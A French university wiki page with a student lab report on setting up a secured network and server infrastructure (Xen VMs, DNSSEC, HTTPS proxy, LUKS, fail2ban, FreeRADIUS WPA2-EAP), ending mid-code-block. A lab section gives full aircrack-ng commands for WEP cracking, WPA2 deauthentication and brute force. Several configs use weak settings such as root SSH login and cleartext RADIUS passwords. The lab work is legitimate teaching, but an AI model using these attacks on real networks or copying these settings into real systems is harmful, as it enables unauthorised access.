wiki-se.plil.fr - Contributions [fr]

SE4 IdO sécurité système/réseau 2025/2026

2026-03-03T20:26:19Z

Msalhi : /* Répartition des binômes pour les travaux pratiques "administration système et réseau" */

= Répartition des binômes pour les travaux pratiques "administration système et réseau" =

Préfixe des noms de machine : <code>SE4</code>.

Domaines Internet à louer sur [[gandi.net]]. Identifiant <code>pifou</code>. Regardez le montant prévu sur le compte avant de louer un domaine.

{| class="wikitable"
! Cahier !! Elève !! Nom de domaine
! Nom de machine de services !! Nom de machine mandataire
|-
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || merteuil.tech || SE4.Merteuil||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || valmont.tech || SE4.Valmont||SE4.Rosemonde
|-
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || kirchhoff.live|| SE4.Tension||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || courant.online|| SE4.Courant||SE4.Kirchhoff
|-
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Cédric PAYET || archlinuxbtw.lol|| SE4.CachyOS||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Thomas DELOBELLE || archlinux.lol|| SE4.Manjaro||SE4.LinusTorvalds
|-
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Ibrahim TEPELI || c2vts.fr|| SE4.C2||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Yassine YAHIANI || rs7.online|| SE4.RS7||SE4.Garage
|-
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Aurèle VANGHELUWE || tompere.online|| SE4-Tompere1||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || tompere2.xyz|| SE4-Tompere2||SE4-Tompere0
|-
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Varesse Evora Souop Metse || elvis21.tech|| SE4.Elf||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Mario Sylainx S. GAUTHIER || kasav.online|| SE4.Kasav||SE4.RockStar
|-
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Billel Cheklat || dardevil.tech|| SE4.catwoman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Antonin Biernacki || deadpool.tech|| SE4.batman||SE4.superman
|-
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Mohamed Salhi || msalhi.online|| SE4.Moon||SE4.Solstice
|}

{| class="wikitable"
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves
!numéro de binôme
!Adresse IPV4 OpenWRT
|-
| SE4.Rosemonde|| 193.48.57.165|| Pierre CASIMIRI & Agathe HOUDUSSE
|1
|193.48.57.177
|-
| SE4.Kirchhoff|| 193.48.57.171|| Lilia GHAZALI & Marin GOURVEST
|
|
|-
| SE4.LinusTorvalds|| 193.48.57.166|| Cédric PAYET & Thomas DELOBELLE
|3
|193.48.57.180
|-
| SE4.Garage|| 193.48.57.170|| Ibrahim TEPELI & Yassine YAHIANI
|4
|193.48.57.178
|-
| SE4-Tompere0|| 193.48.57.168|| Aurèle VANGHELUWE & Tom MERIEN
|5
|
|-
| SE4.superman|| 193.48.57.169|| Billel Cheklat & Antonin Biernacki
|7
|
|-
| SE4.RockStar|| 193.48.57.172|| Varesse Evora Souop Metse & GAUTHIER Mario Sylainx S.
|6
|193.48.57.179
|-
| SE4.Solstice|| 193.48.57.167|| Mohamed Salhi
|2
|193.48.57.173
|-
|}

= Tableau des commutateurs virtuels =

{| class="wikitable"
! Noms des élèves !! Nom du fichier de configuration !! Réseau IPv4 utilisé
|-
| CASIMIRI / HOUDUSSE || pont_gercourt || 192.168.3.0/24
|-
|PAYET / DELOBELLE
|pont_pacman
|192.168.10.0/24
|-
|MERIEN / VANGHELUWE
|pont_pere
|192.168.0.0/24
|-
|CHEKLAT / BIERNACKI
|pont_ironman
|192.168.69.0/24
|-
|SALHI
|pont_msalhi
|192.168.20.0/24
|-
|GOURVEST/GHAZALI
|pont_diviseur
|192.168.67.0/24
|-
|YAHIANI / TEPELI
|pontclio
|192.168.7.0/24
|-
|GAUTHIER / SOUOP METSE
|Styx
|192.168.50.0/24
|}

= Tableau des réseaux virtuels =

VLAN privés :

{| class="wikitable"
! Nom !! Numéro
|-
| VLAN1 || 1
|-
| MV-PROMO || 2
|-
|E1-Pierre
|11
|-
|E2-Agathe
|12
|-
|E5-Cedric
|15
|-
|E6-Thomas
|16
|-
|E9-Aurele
|19
|-
|E10-Tom
|20
|-
|E13-Billel
|23
|-
|E14-Antonin
|24
|-
|E15-MSalhi
|25
|-
|E11-Evora
|28
|-
|E12-Gauthier
|21
|-
|E8-Yassine
|18
|-
|E7-Ibrahim
|17
|}

VLAN communs avec l'école :

{| class="wikitable"
! Nom !! Numéro
|-
| INTERCO1 || 530
|-
|}

= Schéma de câblage =

Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.

Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.

= Plan d'adressage =

{| class="wikitable"
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6
|-
| MV-PROMO || <code>193.48.57.160/27</code> || </code>2001:660:4401:60a0::/64</code>
|-
| PoolPierre || <code>10.60.1.0/24</code> || </code>2001:660:4401:60a1::/64</code>
|-
| PoolAgathe || <code>10.60.2.0/24</code> || </code>2001:660:4401:60a2::/64</code>
|-
|PoolCedric
|<code>10.60.5.0/24</code>
|2001:660:4401:60a5::/64
|-
|PoolThomas
|<code>10.60.6.0/24</code>
|2001:660:4401:60a6::/64
|-
|PoolBillel
|<code>10.60.13.0/24</code>
|2001:660:4401:60ad::/64
|-
|PoolAurele
|<code>10.60.9.0/24</code>
|2001:660:4401:60a9::/64
|-
|PoolTom
|<code>10.60.10.0/24</code>
|2001:660:4401:60aa::/64
|-
|PoolSalhi
|<code>10.60.15.0/24</code>
|2001:660:4401:60b1::/64
|-
|PoolAntonin
|<code>10.60.14.0/24</code>
|2001:660:4401:60ae::/64
|-
|PoolYassine
|10.60.8.0/24
|2001:660:4401:60a8::/64
|-
|PoolEvora
|10.60.11.0/24
|2001:660:4401:60ab::/64
|}

Adresses IPv4 des éléments réseau dans VLAN1

{| class="wikitable"
! Elément !! Adresse
|-
| Routeur C9200-E304 || 172.27.0.1/16
|-
| Routeur C9200-E306 || 172.27.0.2/16
|-
| Borne Wi-Fi E306 || 172.27.0.3/16
|-
| Borne Wi-Fi E304 || 172.27.0.4/16
|}

= Informations VRRP =

Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.

== VLAN des machines virtuelles ==

Une seule instance VRRP dans le VLAN des machines virtuelles.

Adresse IPv4 virtuelle : <code>193.48.57.162</code>

{| class="wikitable"
! Routeur !! IPv4 propre
|-
| C9200 E304 || <code>193.48.57.163</code>
|-
| C9200 E306 || <code>193.48.57.164</code>
|-
|}

== VLAN ... ==

Atelier SysRes SE4 2025/2026 E15

2026-02-27T13:03:10Z

Msalhi : /* Filtrage des services – fail2ban */

<div class="titlepage">

<div class="figure">

[[File:polytech_logo.png|image]]

</div>
'''Rapport de Projet SE4 IdO''' '''Année Universitaire 2025-2026'''

'''Étudiant: Mohamed SALHI''' '''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''

'''Domaine: <code>msalhi.online</code>'''
</div>
= Introduction =

Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.

L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :

* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse
* Une infrastructure réseau redondante avec routeurs Cisco C9200
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)


= Atelier système et réseau - Machines virtuelles =


== Création des machines virtuelles ==

Les machines virtuelles ont été créées sur l’hyperviseur Xen du Dom0 <code>capbreton.plil.info</code>.


=== Commandes de création ===

<syntaxhighlight lang="bash"># Création de la machine de services SE4.Moon
root@capbreton:~# xen-create-image --hostname=SE4.Moon --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force

# Création de la machine mandataire SE4.Solstice
root@capbreton:~# xen-create-image --hostname=SE4.Solstice --dhcp \
--bridge=pontKS --dir=/usr/local/xen --size=10GB \
--dist=daedalus --memory=2048M --force</syntaxhighlight>

=== Démarrage et connexion ===

<syntaxhighlight lang="bash"># Démarrage des VMs
xen create /etc/xen/SE4.Moon.cfg
xen create /etc/xen/SE4.Solstice.cfg

# Connexion aux consoles
xen console SE4.Moon
xen console SE4.Solstice

# Liste des VMs actives
root@capbreton:~# xen list
Name ID Mem VCPUs State Time(s)
SE4.Solstice 39 2048 1 -b---- 2560.1
SE4.Moon 119 2048 1 -b---- 452.3</syntaxhighlight>

== Configuration de la machine de services (SE4.Moon) ==


=== Montage des partitions LVM pour /var et /home ===

<syntaxhighlight lang="bash"># Création des fichiers de partition sur le Dom0
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.var virtual
root@capbreton:/dev/virtual# lvcreate -L 10G -n SE4.Moon.home virtual

# Modification du fichier de configuration Xen
disk = [
'file:/usr/local/xen/domains/SE4.Moon/disk.img,xvda2,w',
'file:/usr/local/xen/domains/SE4.Moon/swap.img,xvda1,w',
'phy:/dev/virtual/SE4.Moon.home,xvdb,w',
'phy:/dev/virtual/SE4.Moon.var,xvdc,w',
]</syntaxhighlight>

=== Formatage et montage des partitions ===

<syntaxhighlight lang="bash"># Formatage des partitions
mkfs -t ext4 /dev/xvdb
mkfs -t ext4 /dev/xvdc

# Montage temporaire et copie des données
mount /dev/xvdc /mnt
mv /var/* /mnt/
umount /mnt

mount /dev/xvdb /mnt
mv /home/* /mnt/
umount /mnt

# Configuration du fstab
cat > /etc/fstab << EOF
/dev/xvda1 none swap sw 0 0
/dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1
/dev/xvdb /home ext4 defaults 0 2
/dev/xvdc /var ext4 defaults 0 2
EOF

# Application des modifications
mount -a</syntaxhighlight>

=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface réseau privée (vers Solstice)
auto eth0
iface eth0 inet static
address 192.168.20.2/24
gateway 192.168.20.1

# Configuration IPv6 automatique
iface eth0 inet6 auto

# Vérification
root@Moon:~# ip a show eth0
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 192.168.20.2/24 brd 192.168.20.255 scope global eth0
inet6 2001:660:4401:60a0:216:3eff:fe6f:f547/64 scope global dynamic</syntaxhighlight>

=== Installation des paquets de base ===

<syntaxhighlight lang="bash">apt update && apt upgrade -y
apt install -y ssh apache2 bind9 bind9utils \
fail2ban openssl iptables-persistent \
net-tools curl wget vim</syntaxhighlight>

== Configuration de la machine mandataire (SE4.Solstice) ==


=== Configuration réseau ===

<syntaxhighlight lang="bash"># Fichier /etc/network/interfaces
auto lo
iface lo inet loopback

# Interface publique (réseau routé)
auto eth1
iface eth1 inet static
address 193.48.57.167/27
gateway 193.48.57.162 # Adresse VRRP virtuelle

iface eth1 inet6 auto

# Interface privée (vers Moon)
auto eth0
iface eth0 inet static
address 192.168.20.1/24

iface eth0 inet6 auto

# Vérification
root@Solstice:~# ip a show eth1
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP
inet 193.48.57.167/27 brd 193.48.57.191 scope global eth1
inet6 2001:660:4401:60a0:216:3eff:fe29:880f/64 scope global dynamic</syntaxhighlight>

=== Mise en place de la mascarade (NAT) ===

<syntaxhighlight lang="bash"># Activation du forwarding IP
echo "net.ipv4.ip_forward=1" >> /etc/sysctl.conf
sysctl -p

# Règles iptables pour la mascarade
iptables -t nat -A POSTROUTING -s 192.168.20.0/24 -o eth1 -j MASQUERADE
iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
iptables -A FORWARD -i eth1 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT

# Sauvegarde pour persistance
iptables-save > /etc/iptables/rules.v4

# Ajout dans interfaces pour chargement au démarrage
post-up iptables-restore < /etc/iptables/rules.v4</syntaxhighlight>

= Services Internet =


== Serveur SSH ==


=== Configuration SSH sur Moon ===

<syntaxhighlight lang="bash"># Édition du fichier de configuration
vim /etc/ssh/sshd_config

# Modifications apportées :
PermitRootLogin yes
PasswordAuthentication yes
Port 22
# LogLevel VERBOSE

# Redémarrage du service
systemctl restart ssh
systemctl enable ssh</syntaxhighlight>

=== Redirection de ports pour l’accès IPv4 ===

<syntaxhighlight lang="bash"># Redirection du port 2201 vers Moon (SSH)
iptables -t nat -A PREROUTING -i eth1 -p tcp --dport 2201 \
-j DNAT --to-destination 192.168.20.2:22

iptables -A FORWARD -p tcp -d 192.168.20.2 --dport 22 -j ACCEPT

# Sauvegarde
iptables-save > /etc/iptables/rules.v4

# Test de la redirection
ssh -p 2201 root@193.48.57.167 # Arrive sur Moon</syntaxhighlight>

== Serveur DNS ==


=== Configuration du serveur maître (Moon) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Fichier de zone /etc/bind/zones/db.msalhi.online
$TTL 86400
@ IN SOA ns1.msalhi.online. admin.msalhi.online. (
2026020320 ; Serial INCRÉMENTÉ et corrigé
3600 ; Refresh
1800 ; Retry
604800 ; Expire
86400 ; Minimum TTL
)

; Serveurs de noms
@ IN NS ns1.msalhi.online.
@ IN NS ns1.merteuil.tech.

; Enregistrements
@ IN A 193.48.57.167
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548
ns1 IN A 193.48.57.167
ns1 IN AAAA 2001:660:4401:60a0:216:3eff:fe6f:f548

www IN CNAME msalhi.online.

# Vérification
named-checkzone msalhi.online /etc/bind/zones/db.msalhi.online</syntaxhighlight>

=== Configuration du serveur secondaire (Solstice) ===

<syntaxhighlight lang="bash"># Fichier /etc/bind/named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "default";
inline-signing yes;
allow-transfer {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fe47:bbe7;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
also-notify {
2001:660:4401:60a0:216:3eff:fe29:880f;
2001:660:4401:60a0:216:3eff:fed6:4bc3;
};
notify yes;
};

# Redémarrage et vérification
systemctl restart bind9
ls -la /var/lib/bind/db.msalhi.online</syntaxhighlight>

=== Configuration chez le registrar Gandi ===

{| class="wikitable"
|+ Configuration DNS chez Gandi
|-
! style="text-align: left;"| '''Type'''
! style="text-align: left;"| '''Valeur'''
! style="text-align: left;"| '''Description'''
|-
| style="text-align: left;"| Nameservers
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| Serveur DNS primaire
|-
| style="text-align: left;"|
| style="text-align: left;"| ns1.merteuil.tech
| style="text-align: left;"| Serveur DNS secondaire
|-
| style="text-align: left;"| Glue Record 1
| style="text-align: left;"| ns1.msalhi.online
| style="text-align: left;"| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7
|-
| style="text-align: left;"| Glue Record 2
| style="text-align: left;"| ns2.msalhi.online
| style="text-align: left;"| IPv4: 193.48.57.167
|}


== Sécurisation de site Web par certificat ==


=== Génération du CSR et obtention du certificat ===

<syntaxhighlight lang="bash"># Génération de la clé privée
openssl genrsa -out /etc/ssl/private/myserver.key 2048

# Génération du CSR
openssl req -new -key /etc/ssl/private/myserver.key \
-out /etc/ssl/private/server.csr</syntaxhighlight>

=== Configuration Apache sur Moon (HTTPS direct IPv6) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-ssl.conf
<VirtualHost *:80>
ServerName msalhi.online
ServerAlias www.msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online
ServerAlias www.msalhi.online

DocumentRoot /var/www/html

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

Header always set Strict-Transport-Security "max-age=63072000; includeSubDomains"
Header always set X-Frame-Options DENY
Header always set X-Content-Type-Options nosniff

ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log
CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined
</VirtualHost>

# Activation
a2enmod ssl
a2ensite msalhi-ssl.conf
systemctl restart apache2</syntaxhighlight>

=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===

<syntaxhighlight lang="bash"># Fichier /etc/apache2/sites-available/msalhi-proxy.conf
<VirtualHost *:80>
ServerName msalhi.online
Redirect permanent / https://msalhi.online/
</VirtualHost>

<VirtualHost *:443>
ServerName msalhi.online

SSLEngine on
SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt
SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key
SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem

SSLProxyEngine on
ProxyPreserveHost On

# Utilisation de l'URL avec nom de domaine comme demandé
ProxyPass / https://msalhi.online/
ProxyPassReverse / https://msalhi.online/

SSLProxyVerify none
SSLProxyCheckPeerCN off

ErrorLog ${APACHE_LOG_DIR}/proxy_error.log
CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined
</VirtualHost>

# Activation des modules
a2enmod proxy proxy_http ssl
a2ensite msalhi-proxy.conf
systemctl restart apache2</syntaxhighlight>

== Sécurisation de serveur DNS par DNSSEC ==


=== Configuration DNSSEC automatique ===

<syntaxhighlight lang="bash"># Création du répertoire pour les clés
mkdir -p /etc/bind/keys
chown bind:bind /etc/bind/keys

# Ajout dans named.conf.local
zone "msalhi.online" {
type master;
file "/etc/bind/zones/db.msalhi.online";
key-directory "/etc/bind/keys";
dnssec-policy "dnspol";
inline-signing yes;
};

# Politique DNSSEC dans named.conf.options
dnssec-policy "dnspol" {
keys {
ksk key-directory lifetime unlimited algorithm 13;
zsk key-directory lifetime unlimited algorithm 13;
};
nsec3param;
};

# Redémarrage et vérification
systemctl restart bind9
dig @localhost msalhi.online DNSKEY +dnssec</syntaxhighlight>

=== Résultat des clés DNSSEC générées ===

<pre>; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec

msalhi.online. 3600 IN DNSKEY 256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==
msalhi.online. 3600 IN DNSKEY 257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==
msalhi.online. 3600 IN DNSKEY 257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==</pre>

=== Enregistrement de la KSK chez Gandi ===

{| class="wikitable"
|+ Configuration DNSSEC chez Gandi
|-
! style="text-align: left;"| '''Paramètre'''
! style="text-align: left;"| '''Valeur'''
|-
| style="text-align: left;"| Algorithm
| style="text-align: left;"| 13 (ECDSAP256SHA256)
|-
| style="text-align: left;"| Flags
| style="text-align: left;"| 257 (KSK)
|-
| style="text-align: left;"| Public Key
| style="text-align: left;"| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==
|}

= Effraction WiFi =

== Cassage de clef WEP d’un point d’accès WiFi ==
Le réseau cible était <code>cracotte01</code> (BSSID <code>04:DA:D2:9C:50:50</code>, canal 4). La procédure a été réalisée depuis la machine <code>zabeth13</code> avec les outils <code>aircrack-ng</code>.

<ol>
<li>Passage de la carte en mode monitor :
<syntaxhighlight lang="bash">sudo airmon-ng start wlan0</syntaxhighlight>
</li>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon</syntaxhighlight>
</li>
<li>Authentification fake (association au point d’accès) :
<syntaxhighlight lang="bash">sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Attaque ARP replay pour générer du trafic :
<syntaxhighlight lang="bash">sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon</syntaxhighlight>
</li>
<li>Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :
<syntaxhighlight lang="bash">sudo aircrack-ng capture_wep-01.cap</syntaxhighlight>
</li>
</ol>

La clé WEP a été trouvée en moins de 15 minutes : <code>FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE</code>.

== Cassage de mot de passe WPA‑PSK par force brute ==
Le réseau <code>kracotte01</code> (BSSID <code>44:AD:D9:5F:87:00</code>, canal 13) utilisait WPA2‑PSK.

<ol>
<li>Capture ciblée :
<syntaxhighlight lang="bash">sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon</syntaxhighlight>
</li>
<li>Désauthentification d’un client (identifié <code>40:A5:EF:01:25:8B</code>) pour forcer un handshake :
<syntaxhighlight lang="bash">sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon</syntaxhighlight>
</li>
<li>Après apparition du message '''“WPA handshake”''' dans <code>airodump‑ng</code>, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :
<syntaxhighlight lang="bash">crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap</syntaxhighlight>
</li>
<li>Résultat : le mot de passe <code>66689666</code> a été découvert après environ 30 minutes.</li>
</ol>

Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.
[[Fichier:Wpa-wps.png|vignette]]
----

= Sécurisations =

== Chiffrement de données ==
Sur Moon, une partition supplémentaire (disque virtuel <code>xvdb</code>, correspondant au volume LVM <code>SE4.Moon.home</code>) a été chiffrée avec LUKS.

<syntaxhighlight lang="bash">
# Chiffrement de la partition
cryptsetup luksFormat /dev/xvdb

# Ouverture du conteneur
cryptsetup open /dev/xvdb home_crypt

# Création d’un système de fichiers
mkfs.ext4 /dev/mapper/home_crypt

# Montage manuel
mount /dev/mapper/home_crypt /mnt/secret
</syntaxhighlight>

Pour automatiser le montage au démarrage, on ajoute dans <code>/etc/crypttab</code> :
<pre>
home_crypt /dev/xvdb none luks
</pre>
et dans <code>/etc/fstab</code> :
<pre>
/dev/mapper/home_crypt /home ext4 defaults 0 2
</pre>

Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.

== Filtrage des services – fail2ban ==
Pour protéger SSH et les requêtes DNS malveillantes, <code>fail2ban</code> a été installé sur Moon et Solstice.

Fichier <code>/etc/fail2ban/jail.local</code> :
<pre>
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 3

[sshd]
enabled = true
port = ssh
filter = sshd
logpath = /var/log/auth.log
maxretry = 3

[named-refused-tcp]
enabled = true
port = domain,953
protocol = tcp
filter = named-refused
logpath = /var/log/named/security.log
maxretry = 3
</pre>

Filtre <code>/etc/fail2ban/filter.d/named-refused.conf</code> :
<pre>
[Definition]
failregex = ^(?:view (?:internal|external): )?query(?: $cache$)?
^zone transfer
^bad zone transfer request: '\S+/IN': non-authoritative zone

ignoreregex =

</pre>

Le service est démarré et activé :
<syntaxhighlight lang="bash">
systemctl enable fail2ban
systemctl restart fail2ban
</syntaxhighlight>

== Sécurisation WiFi par WPA2‑EAP ==

=== Serveur FreeRADIUS sur Moon ===
Installation :
<syntaxhighlight lang="bash">
apt install freeradius freeradius-utils -y
</syntaxhighlight>

Ajout du client (point d’accès) dans <code>/etc/freeradius/3.0/clients.conf</code> :
<pre>
client vlan1_ap1 {
ipaddr = 172.27.0.4 # VLAN 1 management
secret = testing123
shortname = cisco-ap1-vlan1
nas_type = cisco
}
client vlan1_ap2 {
ipaddr = 172.27.0.3 # VLAN 1 management
secret = testing123
shortname = cisco-ap2-vlan1
nas_type = cisco
}

</pre>

Création d’un utilisateur dans <code>/etc/freeradius/3.0/users</code> :
<pre>
"msalhi" Cleartext-Password := "WifiSecure2026!"

"etudiant1" Cleartext-Password := "Password123"

"prof" Cleartext-Password := "AdminSE4!"

</pre>

Configuration EAP pour PEAP‑MSCHAPv2 dans <code>/etc/freeradius/3.0/mods-enabled/eap</code> (type par défaut <code>peap</code>, tunnel intérieur <code>mschapv2</code>).
Un conflit de port (18120) a été résolu en commentant la section <code>listen</code> dans <code>/etc/freeradius/3.0/sites-enabled/inner-tunnel</code> (ou en mettant <code>port = 0</code>).

Test local :
<syntaxhighlight lang="bash">
radtest msalhi WifiSecure2026! localhost 0 testing123

Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76
User-Name = "msalhi"
User-Password = "WifiSecure2026!"
NAS-IP-Address = 127.0.0.1
NAS-Port = 0
Message-Authenticator = 0x00
Cleartext-Password = "WifiSecure2026!"
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20
</syntaxhighlight>
→ réponse <code>Access-Accept</code> attendue.

=== Configuration du point d’accès WiFi ===
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :
<syntaxhighlight lang="cisco">
aaa group server radius radius_student25
server 192.168.20.2 auth-port 1812 acct-port 1813

aaa authentication login eap_student25 group radius_student25

dot11 ssid VM_SERVICES_15
vlan 25
authentication open eap eap_student25
authentication network-eap eap_student25
authentication key-management wpa version 2
mbssid guest-mode

interface Dot11Radio0
encryption vlan 25 mode ciphers aes-ccm
ssid VM_SERVICES_15

interface Dot11Radio0.25
encapsulation dot1Q 25
bridge-group 25

interface GigabitEthernet0.25
encapsulation dot1Q 25
bridge-group 25

radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026
</syntaxhighlight>

=== Configuration DHCP sur les routeurs ===
Sur '''E304''' (plage 100‑150) :
<syntaxhighlight lang="cisco">
ip dhcp excluded-address 10.60.15.1 10.60.15.99
ip dhcp excluded-address 10.60.15.151 10.60.15.254

ip dhcp pool SALHI_VLAN25
network 10.60.15.0 255.255.255.0
default-router 10.60.15.1
dns-server 192.168.20.2 8.8.8.8
domain-name msalhi.online
lease 0 12
</syntaxhighlight>

=== Policy‑Based Routing (PBR) ===
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :

<syntaxhighlight lang="cisco">
ip access-list extended TRAFIC_VLAN25
permit ip 10.60.15.0 0.0.0.255 any
!
route-map PBR_VLAN25 permit 10
match ip address TRAFIC_VLAN25
set ip next-hop 193.48.57.167
!
interface Vlan25
ip policy route-map PBR_VLAN25
</syntaxhighlight>

Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :
<syntaxhighlight lang="bash">
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE
iptables-save > /etc/iptables/rules.v4
</syntaxhighlight>

=== Tests ===
Un client connecté au SSID <code>VM_SERVICES_15</code> obtient une adresse IP dans la plage DHCP (ex. <code>10.60.15.101</code>), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (<code>193.48.57.167</code>).

= Vérifications et tests =

Cette section regroupe l’ensemble des commandes exécutées pour valider le bon fonctionnement de chaque composant de l’infrastructure. Les sorties sont présentées telles qu’obtenues sur les machines concernées.

== Services Web ==

=== Sur Moon (machine de services) ===
Vérification de l’écoute Apache sur les ports 80 et 443 :
<syntaxhighlight lang="bash">
ss -tlnp | grep -E ':80|:443'
</syntaxhighlight>
<pre>
LISTEN 0 128 *:80 *:* users:(("apache2",pid=16838,fd=4),("apache2",pid=16837,fd=4),("apache2",pid=7274,fd=4))
LISTEN 0 128 *:443 *:* users:(("apache2",pid=16838,fd=6),("apache2",pid=16837,fd=6),("apache2",pid=7274,fd=6))
</pre>

Test d’accès HTTPS en local (IPv6) :
<syntaxhighlight lang="bash">
